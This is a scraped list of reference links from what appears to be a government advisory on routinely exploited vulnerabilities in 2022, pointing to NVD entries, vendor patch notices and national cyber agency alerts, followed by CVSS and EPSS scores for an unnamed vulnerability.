nvd.nist.gov/vuln/detail/CVE-2022-30190
nvd.nist.gov/vuln/detail/CVE-2022-40684
nvd.nist.gov/vuln/detail/CVE-2022-40684
nvd.nist.gov/vuln/detail/CVE-2022-41082
nvd.nist.gov/vuln/detail/CVE-2022-41082
nvd.nist.gov/vuln/detail/CVE-2022-42475
nvd.nist.gov/vuln/detail/CVE-2022-42475
nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-218.pdf
nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-218.pdf
nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-218.pdf
nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-218.pdf
nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-218.pdf
nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-218.pdf
psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0001
psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0007
psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0026
public.govdelivery.com/accounts/USDHSCISA/subscriber/new?topic_id=USDHSCISA_138
spring.io/security/cve-2022-22963
support.citrix.com/article/CTX267027/cve201919781-vulnerability-in-citrix-application-delivery-controller-citrix-gateway-and-citrix-sdwan-wanop-appliance
twitter.com/CISAgov
twitter.com/intent/tweet?text=2022%20Top%20Routinely%20Exploited%20Vulnerabilities+https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-215a
wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P30
wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P24.1#Security_Fixes
wso2docs.atlassian.net/wiki/spaces
www.cisa.gov/cross-sector-cybersecurity-performance-goals
www.cisa.gov/known-exploited-vulnerabilities-catalog
www.cisa.gov/news-events/alerts/2021/08/21/urgent-protect-against-active-exploitation-proxyshell-vulnerabilities
www.cisa.gov/news-events/alerts/2021/08/21/urgent-protect-against-active-exploitation-proxyshell-vulnerabilities
www.cisa.gov/news-events/alerts/2021/09/03/atlassian-releases-security-updates-confluence-server-and-data-center
www.cisa.gov/news-events/alerts/2022/02/08/critical-vulnerabilities-affecting-sap-applications-employing
www.cisa.gov/news-events/alerts/2022/05/31/microsoft-releases-workaround-guidance-msdt-follina-vulnerability
www.cisa.gov/news-events/alerts/2022/06/02/cisa-adds-one-known-exploited-vulnerability-cve-2022-26134-catalog
www.cisa.gov/news-events/cybersecurity-advisories/aa20-010a
www.cisa.gov/news-events/cybersecurity-advisories/aa20-133a
www.cisa.gov/news-events/cybersecurity-advisories/aa20-206a
www.cisa.gov/news-events/cybersecurity-advisories/aa20-258a
www.cisa.gov/news-events/cybersecurity-advisories/aa20-258a
www.cisa.gov/news-events/cybersecurity-advisories/aa20-283a
www.cisa.gov/news-events/cybersecurity-advisories/aa20-283a
www.cisa.gov/news-events/cybersecurity-advisories/aa20-283a
www.cisa.gov/news-events/cybersecurity-advisories/aa20-283a
www.cisa.gov/news-events/cybersecurity-advisories/aa21-062a
www.cisa.gov/news-events/cybersecurity-advisories/aa21-062a
www.cisa.gov/news-events/cybersecurity-advisories/aa21-062a
www.cisa.gov/news-events/cybersecurity-advisories/aa21-062a
www.cisa.gov/news-events/cybersecurity-advisories/aa21-209a
www.cisa.gov/news-events/cybersecurity-advisories/aa21-259a
www.cisa.gov/news-events/cybersecurity-advisories/aa21-321a
www.cisa.gov/news-events/cybersecurity-advisories/aa21-321a
www.cisa.gov/news-events/cybersecurity-advisories/aa21-356a
www.cisa.gov/news-events/cybersecurity-advisories/aa22-047a
www.cisa.gov/news-events/cybersecurity-advisories/aa22-117a
www.cisa.gov/news-events/cybersecurity-advisories/aa22-117a
www.cisa.gov/news-events/cybersecurity-advisories/aa22-138a
www.cisa.gov/news-events/cybersecurity-advisories/aa22-138b
www.cisa.gov/news-events/news/apache-log4j-vulnerability-guidance
www.cisa.gov/news-events/news/apache-log4j-vulnerability-guidance
www.cisa.gov/news-events/news/apache-log4j-vulnerability-guidance
www.cisa.gov/resources-tools/resources/secure-by-design-and-default
www.cisa.gov/resources-tools/resources/secure-by-design-and-default
www.cisa.gov/uscert/ncas/alerts/aa21-209a
www.cyber.gc.ca/en/alerts/active-exploitation-apache-log4j-vulnerability
www.cyber.gc.ca/en/alerts/apt-actors-target-us-and-allied-networks-nsacisafbi
www.cyber.gc.ca/en/alerts/detecting-compromises-relating-citrix-cve-2019-19781-0
www.cyber.gc.ca/en/alerts/microsoft-netlogon-elevation-privilege-vulnerability-cve-2020-1472
www.cyber.gc.ca/en/alerts/sonicwall-security-advisory-4
www.cyber.gov.au/about-us/advisories/2019-129-recommendations-mitigate-vulnerability-pulse-connect-secure-vpn-software
www.cyber.gov.au/about-us/advisories/2021-007-log4j-vulnerability-advice-and-mitigations
www.cyber.gov.au/about-us/advisories/advisory-2020-016-zerologon-netlogon-elevation-privilege-vulnerability-cve-2020-1472
www.cyber.gov.au/about-us/alerts/critical-vulnerability-manageengine-adselfservice-plus-exploited-cyber-actors
www.cyber.gov.au/about-us/alerts/microsoft-exchange-proxyshell-targeting-australia
www.cyber.gov.au/about-us/alerts/remote-code-execution-vulnerability-present-certain-versions-atlassian-confluence
www.cyber.gov.au/about-us/alerts/remote-code-execution-vulnerability-present-sonicwall-sma-100-series-appliances
www.cyber.gov.au/about-us/alerts/vulnerability-alert-2-new-vulnerabilities-associated-microsoft-exchange
www.cyber.gov.au/resources-business-and-government/essential-cyber-security/essential-eight/essential-eight-maturity-model
www.cyber.gov.au/resources-business-and-government/governance-and-user-education/governance/log4j-what-boards-and-directors-need-know
www.cyber.gov.au/resources-business-and-government/governance-and-user-education/governance/vulnerability-disclosure-programs-explained
www.cyber.gov.au/resources-business-and-government/maintaining-devices-and-systems/outsourcing-and-procurement/cyber-supply-chains/cyber-supply-chain-risk-management
www.cyber.gov.au/resources-business-and-government/maintaining-devices-and-systems/outsourcing-and-procurement/managed-services/how-manage-your-security-when-engaging-managed-service-provider
www.cyber.gov.au/resources-business-and-government/maintaining-devices-and-systems/system-hardening-and-administration/system-hardening/implementing-multi-factor-authentication
www.dhs.gov
www.dhs.gov/foia
www.dhs.gov/performance-financial-reports
www.facebook.com/CISA
www.facebook.com/sharer/sharer.php?u=https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-215a&title=2022%20Top%20Routinely%20Exploited%20Vulnerabilities
www.fortiguard.com/psirt/FG-IR-20-233
www.fortiguard.com/psirt/FG-IR-22-377
www.fortiguard.com/psirt/FG-IR-22-398
www.instagram.com/cisagov
www.linkedin.com/company/cybersecurity-and-infrastructure-security-agency
www.linkedin.com/sharing/share-offsite/?url=https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-215a
www.manageengine.com/products/self-service-password/advisory/CVE-2021-40539.html
www.oig.dhs.gov/
www.oracle.com/security-alerts/cpuoct2020traditional.html
www.oracle.com/security-alerts/cpuoct2020traditional.html
www.qnap.com/en/security-advisory/qsa-22-24
www.usa.gov/
www.vmware.com/security/advisories/VMSA-2022-0011.html
www.vmware.com/security/advisories/VMSA-2022-0011.html
www.whitehouse.gov/
www.youtube.com/@cisagov
mailto:?subject=2022%20Top%20Routinely%20Exploited%20Vulnerabilities&body=www.cisa.gov/news-events/cybersecurity-advisories/aa23-215a
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H
EPSS
Percentile
100.0%